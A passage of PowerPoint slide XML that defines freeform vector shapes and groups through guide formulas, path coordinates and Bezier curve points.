                  <a:gd name="T11" fmla="*/ 789 h 11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775"/>
                  <a:gd name="T19" fmla="*/ 0 h 1198"/>
                  <a:gd name="T20" fmla="*/ 2775 w 2775"/>
                  <a:gd name="T21" fmla="*/ 1198 h 119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775" h="1198">
                    <a:moveTo>
                      <a:pt x="0" y="789"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1495" y="1198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2043" y="706"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2775" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2426" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="78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4" name="Freeform 14575"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="342" y="-467"/>
                <a:ext cx="11750" cy="3769"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 247 w 2983"/>
                  <a:gd name="T1" fmla="*/ 42 h 956"/>
                  <a:gd name="T2" fmla="*/ 448 w 2983"/>
                  <a:gd name="T3" fmla="*/ 23 h 956"/>
                  <a:gd name="T4" fmla="*/ 932 w 2983"/>
                  <a:gd name="T5" fmla="*/ 193 h 956"/>
                  <a:gd name="T6" fmla="*/ 2930 w 2983"/>
                  <a:gd name="T7" fmla="*/ 692 h 956"/>
                  <a:gd name="T8" fmla="*/ 2936 w 2983"/>
                  <a:gd name="T9" fmla="*/ 694 h 956"/>
                  <a:gd name="T10" fmla="*/ 2937 w 2983"/>
                  <a:gd name="T11" fmla="*/ 694 h 956"/>
                  <a:gd name="T12" fmla="*/ 2937 w 2983"/>
                  <a:gd name="T13" fmla="*/ 694 h 956"/>
                  <a:gd name="T14" fmla="*/ 2978 w 2983"/>
                  <a:gd name="T15" fmla="*/ 755 h 956"/>
                  <a:gd name="T16" fmla="*/ 2949 w 2983"/>
                  <a:gd name="T17" fmla="*/ 828 h 956"/>
                  <a:gd name="T18" fmla="*/ 2949 w 2983"/>
                  <a:gd name="T19" fmla="*/ 828 h 956"/>
                  <a:gd name="T20" fmla="*/ 2949 w 2983"/>
                  <a:gd name="T21" fmla="*/ 828 h 956"/>
                  <a:gd name="T22" fmla="*/ 2941 w 2983"/>
                  <a:gd name="T23" fmla="*/ 831 h 956"/>
                  <a:gd name="T24" fmla="*/ 2933 w 2983"/>
                  <a:gd name="T25" fmla="*/ 831 h 956"/>
                  <a:gd name="T26" fmla="*/ 1888 w 2983"/>
                  <a:gd name="T27" fmla="*/ 900 h 956"/>
                  <a:gd name="T28" fmla="*/ 834 w 2983"/>
                  <a:gd name="T29" fmla="*/ 640 h 956"/>
                  <a:gd name="T30" fmla="*/ 37 w 2983"/>
                  <a:gd name="T31" fmla="*/ 163 h 956"/>
                  <a:gd name="T32" fmla="*/ 247 w 2983"/>
                  <a:gd name="T33" fmla="*/ 42 h 9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983"/>
                  <a:gd name="T52" fmla="*/ 0 h 956"/>
                  <a:gd name="T53" fmla="*/ 2983 w 2983"/>
                  <a:gd name="T54" fmla="*/ 956 h 9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983" h="956">
                    <a:moveTo>
                      <a:pt x="247" y="42"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="321" y="22"/>
                      <a:pt x="344" y="0"/>
                      <a:pt x="448" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="585" y="53"/>
                      <a:pt x="869" y="168"/>
                      <a:pt x="932" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1075" y="248"/>
                      <a:pt x="2804" y="662"/>
                      <a:pt x="2930" y="692"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2932" y="692"/>
                      <a:pt x="2934" y="693"/>
                      <a:pt x="2936" y="694"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2937" y="694"/>
                      <a:pt x="2937" y="694"/>
                      <a:pt x="2937" y="694"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2937" y="694"/>
                      <a:pt x="2937" y="694"/>
                      <a:pt x="2937" y="694"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2957" y="701"/>
                      <a:pt x="2973" y="725"/>
                      <a:pt x="2978" y="755"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2983" y="788"/>
                      <a:pt x="2970" y="819"/>
                      <a:pt x="2949" y="828"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2949" y="828"/>
                      <a:pt x="2949" y="828"/>
                      <a:pt x="2949" y="828"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2949" y="828"/>
                      <a:pt x="2949" y="828"/>
                      <a:pt x="2949" y="828"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2947" y="830"/>
                      <a:pt x="2944" y="831"/>
                      <a:pt x="2941" y="831"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2938" y="831"/>
                      <a:pt x="2935" y="831"/>
                      <a:pt x="2933" y="831"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2816" y="850"/>
                      <a:pt x="2117" y="956"/>
                      <a:pt x="1888" y="900"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1639" y="839"/>
                      <a:pt x="834" y="640"/>
                      <a:pt x="834" y="640"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="457" y="546"/>
                      <a:pt x="0" y="319"/>
                      <a:pt x="37" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="133"/>
                      <a:pt x="78" y="88"/>
                      <a:pt x="247" y="4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5" name="Freeform 14576"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1435" y="-367"/>
                <a:ext cx="379" cy="291"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 96 w 96"/>
                  <a:gd name="T1" fmla="*/ 43 h 74"/>
                  <a:gd name="T2" fmla="*/ 25 w 96"/>
                  <a:gd name="T3" fmla="*/ 0 h 74"/>
                  <a:gd name="T4" fmla="*/ 0 w 96"/>
                  <a:gd name="T5" fmla="*/ 8 h 74"/>
                  <a:gd name="T6" fmla="*/ 89 w 96"/>
                  <a:gd name="T7" fmla="*/ 74 h 74"/>
                  <a:gd name="T8" fmla="*/ 96 w 96"/>
                  <a:gd name="T9" fmla="*/ 4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74"/>
                  <a:gd name="T17" fmla="*/ 96 w 96"/>
                  <a:gd name="T18" fmla="*/ 74 h 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74">
                    <a:moveTo>
                      <a:pt x="96" y="43"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="43"/>
                      <a:pt x="40" y="25"/>
                      <a:pt x="25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33" y="61"/>
                      <a:pt x="89" y="74"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="96" y="4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6" name="Freeform 14577"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1495" y="1365"/>
                <a:ext cx="5678" cy="2308"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1778 w 3404"/>
                  <a:gd name="T1" fmla="*/ 0 h 1382"/>
                  <a:gd name="T2" fmla="*/ 0 w 3404"/>
                  <a:gd name="T3" fmla="*/ 1226 h 1382"/>
                  <a:gd name="T4" fmla="*/ 543 w 3404"/>
                  <a:gd name="T5" fmla="*/ 1382 h 1382"/>
                  <a:gd name="T6" fmla="*/ 2069 w 3404"/>
                  <a:gd name="T7" fmla="*/ 778 h 1382"/>
                  <a:gd name="T8" fmla="*/ 3404 w 3404"/>
                  <a:gd name="T9" fmla="*/ 435 h 1382"/>
                  <a:gd name="T10" fmla="*/ 1778 w 3404"/>
                  <a:gd name="T11" fmla="*/ 0 h 13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04"/>
                  <a:gd name="T19" fmla="*/ 0 h 1382"/>
                  <a:gd name="T20" fmla="*/ 3404 w 3404"/>
                  <a:gd name="T21" fmla="*/ 1382 h 138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04" h="1382">
                    <a:moveTo>
                      <a:pt x="1778" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="1382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2069" y="778"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3404" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177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7" name="Freeform 14578"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="10343" y="1604"/>
                <a:ext cx="3107" cy="671"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 784 w 1864"/>
                  <a:gd name="T1" fmla="*/ 402 h 402"/>
                  <a:gd name="T2" fmla="*/ 1864 w 1864"/>
                  <a:gd name="T3" fmla="*/ 33 h 402"/>
                  <a:gd name="T4" fmla="*/ 1675 w 1864"/>
                  <a:gd name="T5" fmla="*/ 0 h 402"/>
                  <a:gd name="T6" fmla="*/ 0 w 1864"/>
                  <a:gd name="T7" fmla="*/ 248 h 402"/>
                  <a:gd name="T8" fmla="*/ 784 w 1864"/>
                  <a:gd name="T9" fmla="*/ 402 h 4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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 402"/>
                  <a:gd name="T17" fmla="*/ 1864 w 1864"/>
                  <a:gd name="T18" fmla="*/ 402 h 4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4" h="402">
                    <a:moveTo>
                      <a:pt x="784" y="402"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1864" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1675" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="784" y="40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8" name="Freeform 14579"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="9558" y="2266"/>
                <a:ext cx="1504" cy="754"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 902 w 902"/>
                  <a:gd name="T1" fmla="*/ 163 h 451"/>
                  <a:gd name="T2" fmla="*/ 281 w 902"/>
                  <a:gd name="T3" fmla="*/ 451 h 451"/>
                  <a:gd name="T4" fmla="*/ 0 w 902"/>
                  <a:gd name="T5" fmla="*/ 392 h 451"/>
                  <a:gd name="T6" fmla="*/ 28 w 902"/>
                  <a:gd name="T7" fmla="*/ 0 h 451"/>
                  <a:gd name="T8" fmla="*/ 902 w 902"/>
                  <a:gd name="T9" fmla="*/ 163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02"/>
                  <a:gd name="T16" fmla="*/ 0 h 451"/>
                  <a:gd name="T17" fmla="*/ 902 w 902"/>
                  <a:gd name="T18" fmla="*/ 451 h 4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02" h="451">
                    <a:moveTo>
                      <a:pt x="902" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="281" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="902" y="16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9" name="Freeform 14580"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="9689" y="232"/>
                <a:ext cx="2645" cy="2069"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 536 w 672"/>
                  <a:gd name="T1" fmla="*/ 525 h 525"/>
                  <a:gd name="T2" fmla="*/ 534 w 672"/>
                  <a:gd name="T3" fmla="*/ 518 h 525"/>
                  <a:gd name="T4" fmla="*/ 672 w 672"/>
                  <a:gd name="T5" fmla="*/ 53 h 525"/>
                  <a:gd name="T6" fmla="*/ 478 w 672"/>
                  <a:gd name="T7" fmla="*/ 0 h 525"/>
                  <a:gd name="T8" fmla="*/ 0 w 672"/>
                  <a:gd name="T9" fmla="*/ 421 h 525"/>
                  <a:gd name="T10" fmla="*/ 536 w 672"/>
                  <a:gd name="T11" fmla="*/ 525 h 5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72"/>
                  <a:gd name="T19" fmla="*/ 0 h 525"/>
                  <a:gd name="T20" fmla="*/ 672 w 672"/>
                  <a:gd name="T21" fmla="*/ 525 h 52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72" h="525">
                    <a:moveTo>
                      <a:pt x="536" y="525"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="536" y="525"/>
                      <a:pt x="535" y="519"/>
                      <a:pt x="534" y="518"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="502" y="488"/>
                      <a:pt x="672" y="53"/>
                      <a:pt x="672" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="478" y="0"/>
                      <a:pt x="478" y="0"/>
                      <a:pt x="478" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="421"/>
                      <a:pt x="0" y="421"/>
                      <a:pt x="0" y="421"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="536" y="52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780" name="Group 1848"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4467921" y="1823444"/>
              <a:ext cx="1057275" cy="488950"/>
              <a:chOff x="1570" y="-4084"/>
              <a:chExt cx="8289" cy="3839"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="781" name="Freeform 1849"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5496" y="-1056"/>
                <a:ext cx="212" cy="213"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 74 w 90"/>
                  <a:gd name="T1" fmla="*/ 25 h 90"/>
                  <a:gd name="T2" fmla="*/ 29 w 90"/>
                  <a:gd name="T3" fmla="*/ 5 h 90"/>
                  <a:gd name="T4" fmla="*/ 29 w 90"/>
                  <a:gd name="T5" fmla="*/ 5 h 90"/>
                  <a:gd name="T6" fmla="*/ 0 w 90"/>
                  <a:gd name="T7" fmla="*/ 15 h 90"/>
                  <a:gd name="T8" fmla="*/ 40 w 90"/>
                  <a:gd name="T9" fmla="*/ 90 h 90"/>
                  <a:gd name="T10" fmla="*/ 69 w 90"/>
                  <a:gd name="T11" fmla="*/ 81 h 90"/>
                  <a:gd name="T12" fmla="*/ 69 w 90"/>
                  <a:gd name="T13" fmla="*/ 81 h 90"/>
                  <a:gd name="T14" fmla="*/ 77 w 90"/>
                  <a:gd name="T15" fmla="*/ 77 h 90"/>
                  <a:gd name="T16" fmla="*/ 74 w 90"/>
                  <a:gd name="T17" fmla="*/ 25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90"/>
                  <a:gd name="T29" fmla="*/ 90 w 90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90">
                    <a:moveTo>
                      <a:pt x="74" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="8"/>
                      <a:pt x="42" y="0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0" y="90"/>
                      <a:pt x="40" y="90"/>
                      <a:pt x="40" y="90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2" y="80"/>
                      <a:pt x="74" y="79"/>
                      <a:pt x="77" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="67"/>
                      <a:pt x="89" y="44"/>
                      <a:pt x="74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2" name="Freeform 1850"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5453" y="-1039"/>
                <a:ext cx="187" cy="210"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 79"/>
                  <a:gd name="T1" fmla="*/ 79 h 89"/>
                  <a:gd name="T2" fmla="*/ 16 w 79"/>
                  <a:gd name="T3" fmla="*/ 63 h 89"/>
                  <a:gd name="T4" fmla="*/ 13 w 79"/>
                  <a:gd name="T5" fmla="*/ 10 h 89"/>
                  <a:gd name="T6" fmla="*/ 63 w 79"/>
                  <a:gd name="T7" fmla="*/ 27 h 89"/>
                  <a:gd name="T8" fmla="*/ 66 w 79"/>
                  <a:gd name="T9" fmla="*/ 7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89"/>
                  <a:gd name="T17" fmla="*/ 79 w 79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89">
                    <a:moveTo>
                      <a:pt x="66" y="79"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="89"/>
                      <a:pt x="30" y="82"/>
                      <a:pt x="16" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="43"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="13" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="0"/>
                      <a:pt x="49" y="7"/>
                      <a:pt x="63" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="66" y="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3" name="Freeform 1851"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5522" y="-963"/>
                <a:ext cx="49" cy="59"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 21"/>
                  <a:gd name="T1" fmla="*/ 22 h 25"/>
                  <a:gd name="T2" fmla="*/ 4 w 21"/>
                  <a:gd name="T3" fmla="*/ 17 h 25"/>
                  <a:gd name="T4" fmla="*/ 3 w 21"/>
                  <a:gd name="T5" fmla="*/ 3 h 25"/>
                  <a:gd name="T6" fmla="*/ 17 w 21"/>
                  <a:gd name="T7" fmla="*/ 8 h 25"/>
                  <a:gd name="T8" fmla="*/ 18 w 21"/>
                  <a:gd name="T9" fmla="*/ 2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25"/>
                  <a:gd name="T17" fmla="*/ 21 w 21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25">
                    <a:moveTo>
                      <a:pt x="18" y="22"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="25"/>
                      <a:pt x="8" y="23"/>
                      <a:pt x="4" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="12"/>
                      <a:pt x="0" y="6"/>
                      <a:pt x="3" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="13" y="2"/>
                      <a:pt x="17" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="13"/>
                      <a:pt x="21" y="19"/>
                      <a:pt x="18" y="2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4" name="Freeform 1852"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5538" y="-945"/>
                <a:ext cx="17" cy="22"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 7"/>
                  <a:gd name="T1" fmla="*/ 8 h 9"/>
                  <a:gd name="T2" fmla="*/ 1 w 7"/>
                  <a:gd name="T3" fmla="*/ 6 h 9"/>
                  <a:gd name="T4" fmla="*/ 1 w 7"/>
                  <a:gd name="T5" fmla="*/ 1 h 9"/>
                  <a:gd name="T6" fmla="*/ 6 w 7"/>
                  <a:gd name="T7" fmla="*/ 3 h 9"/>
                  <a:gd name="T8" fmla="*/ 6 w 7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9"/>
                  <a:gd name="T17" fmla="*/ 7 w 7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9">
                    <a:moveTo>
                      <a:pt x="6" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="9"/>
                      <a:pt x="3" y="8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6" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="5"/>
                      <a:pt x="7" y="7"/>
                      <a:pt x="6" y="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5" name="Freeform 1853"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5517" y="-1006"/>
                <a:ext cx="57" cy="83"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 24"/>
                  <a:gd name="T1" fmla="*/ 0 h 35"/>
                  <a:gd name="T2" fmla="*/ 0 w 24"/>
                  <a:gd name="T3" fmla="*/ 30 h 35"/>
                  <a:gd name="T4" fmla="*/ 9 w 24"/>
                  <a:gd name="T5" fmla="*/ 34 h 35"/>
                  <a:gd name="T6" fmla="*/ 19 w 24"/>
                  <a:gd name="T7" fmla="*/ 33 h 35"/>
                  <a:gd name="T8" fmla="*/ 24 w 24"/>
                  <a:gd name="T9" fmla="*/ 4 h 35"/>
                  <a:gd name="T10" fmla="*/ 5 w 24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35"/>
                  <a:gd name="T20" fmla="*/ 24 w 24"/>
                  <a:gd name="T21" fmla="*/ 35 h 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35">
                    <a:moveTo>
                      <a:pt x="5" y="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1"/>
                      <a:pt x="4" y="33"/>
                      <a:pt x="9" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="35"/>
                      <a:pt x="18" y="34"/>
                      <a:pt x="19" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="4"/>
                      <a:pt x="24" y="4"/>
                      <a:pt x="24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6" name="Freeform 1854"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5517" y="-1070"/>
                <a:ext cx="78" cy="76"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 33"/>
                  <a:gd name="T1" fmla="*/ 0 h 32"/>
                  <a:gd name="T2" fmla="*/ 1 w 33"/>
                  <a:gd name="T3" fmla="*/ 24 h 32"/>
                  <a:gd name="T4" fmla="*/ 14 w 33"/>
                  <a:gd name="T5" fmla="*/ 31 h 32"/>
                  <a:gd name="T6" fmla="*/ 29 w 33"/>
                  <a:gd name="T7" fmla="*/ 29 h 32"/>
                  <a:gd name="T8" fmla="*/ 33 w 33"/>
                  <a:gd name="T9" fmla="*/ 5 h 32"/>
                  <a:gd name="T10" fmla="*/ 5 w 33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3"/>
                  <a:gd name="T19" fmla="*/ 0 h 32"/>
                  <a:gd name="T20" fmla="*/ 33 w 33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3" h="32">
                    <a:moveTo>
                      <a:pt x="5" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="24"/>
                      <a:pt x="1" y="24"/>
                      <a:pt x="1" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="26"/>
                      <a:pt x="6" y="29"/>
                      <a:pt x="14" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="32"/>
                      <a:pt x="29" y="31"/>
                      <a:pt x="29" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="5"/>
                      <a:pt x="33" y="5"/>
                      <a:pt x="33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7" name="Freeform 1855"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5368" y="-1022"/>
                <a:ext cx="213" cy="212"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 75 w 90"/>
                  <a:gd name="T1" fmla="*/ 25 h 90"/>
                  <a:gd name="T2" fmla="*/ 29 w 90"/>
                  <a:gd name="T3" fmla="*/ 5 h 90"/>
                  <a:gd name="T4" fmla="*/ 29 w 90"/>
                  <a:gd name="T5" fmla="*/ 5 h 90"/>
                  <a:gd name="T6" fmla="*/ 0 w 90"/>
                  <a:gd name="T7" fmla="*/ 15 h 90"/>
                  <a:gd name="T8" fmla="*/ 41 w 90"/>
                  <a:gd name="T9" fmla="*/ 90 h 90"/>
                  <a:gd name="T10" fmla="*/ 69 w 90"/>
                  <a:gd name="T11" fmla="*/ 81 h 90"/>
                  <a:gd name="T12" fmla="*/ 69 w 90"/>
                  <a:gd name="T13" fmla="*/ 81 h 90"/>
                  <a:gd name="T14" fmla="*/ 77 w 90"/>
                  <a:gd name="T15" fmla="*/ 78 h 90"/>
                  <a:gd name="T16" fmla="*/ 75 w 90"/>
                  <a:gd name="T17" fmla="*/ 25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90"/>
                  <a:gd name="T29" fmla="*/ 90 w 90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90">
                    <a:moveTo>
                      <a:pt x="75" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="8"/>
                      <a:pt x="43" y="0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1" y="90"/>
                      <a:pt x="41" y="90"/>
                      <a:pt x="41" y="90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2" y="81"/>
                      <a:pt x="75" y="80"/>
                      <a:pt x="77" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="68"/>
                      <a:pt x="89" y="44"/>
                      <a:pt x="75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8" name="Freeform 1856"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5328" y="-1006"/>
                <a:ext cx="187" cy="213"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 79"/>
                  <a:gd name="T1" fmla="*/ 80 h 90"/>
                  <a:gd name="T2" fmla="*/ 15 w 79"/>
                  <a:gd name="T3" fmla="*/ 63 h 90"/>
                  <a:gd name="T4" fmla="*/ 13 w 79"/>
                  <a:gd name="T5" fmla="*/ 10 h 90"/>
                  <a:gd name="T6" fmla="*/ 63 w 79"/>
                  <a:gd name="T7" fmla="*/ 27 h 90"/>
                  <a:gd name="T8" fmla="*/ 66 w 79"/>
                  <a:gd name="T9" fmla="*/ 8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90"/>
                  <a:gd name="T17" fmla="*/ 79 w 79"/>
                  <a:gd name="T18" fmla="*/ 90 h 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90">
                    <a:moveTo>
                      <a:pt x="66" y="80"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="90"/>
                      <a:pt x="30" y="82"/>
                      <a:pt x="15" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="44"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="13" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="0"/>
                      <a:pt x="48" y="8"/>
                      <a:pt x="63" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="46"/>
                      <a:pt x="79" y="70"/>
                      <a:pt x="66" y="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9" name="Freeform 1857"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5394" y="-928"/>
                <a:ext cx="52" cy="57"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 22"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 5 w 22"/>
                  <a:gd name="T3" fmla="*/ 17 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 22"/>
                  <a:gd name="T5" fmla="*/ 2 h 24"/>
                  <a:gd name="T6" fmla="*/ 18 w 22"/>
                  <a:gd name="T7" fmla="*/ 7 h 24"/>
                  <a:gd name="T8" fmla="*/ 18 w 22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24"/>
                  <a:gd name="T17" fmla="*/ 22 w 22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24">
                    <a:moveTo>
                      <a:pt x="18" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="24"/>
                      <a:pt x="9" y="22"/>
                      <a:pt x="5" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="11"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="4" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="14" y="2"/>
                      <a:pt x="18" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="12"/>
